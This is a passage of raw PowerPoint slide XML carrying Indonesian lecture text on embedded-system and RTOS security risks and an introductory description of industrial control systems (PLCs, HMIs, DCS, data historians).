              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendapatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kendali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dirancang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikendalikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyebabkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konsekuensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serius</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengingat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengandalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> RTOS, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>medis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>industri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pelanggaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyebabkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cedera</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada orang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerusakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peralatan</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143</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9976390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Sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Industri</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Alur </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Otomasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Proses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>industri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (ICS) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mekanisme</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otomatisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> proses. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mesin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemasok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>listrik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemasok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> air, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kesehatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telekomunikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nasional</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. ICS yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otomatisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terdistribusi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (DCS).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>ICS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terdiri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peralatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pabrik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> PLC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertanam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. PLC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dihubungkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> serial fieldbus OT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh Ethernet </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>industri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktuator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengoperasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>katup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, motor, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemutus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sirkuit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komponen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mekanis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditambah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> sensor yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memantau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keadaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>suhu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Output dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> PLC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antarmuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manusia-mesin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (HMI). HMI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berupa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> panel </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berjalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. PLC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhubung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> loop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seluruh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otomasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diatur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Konsep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sejarawan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> basis data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
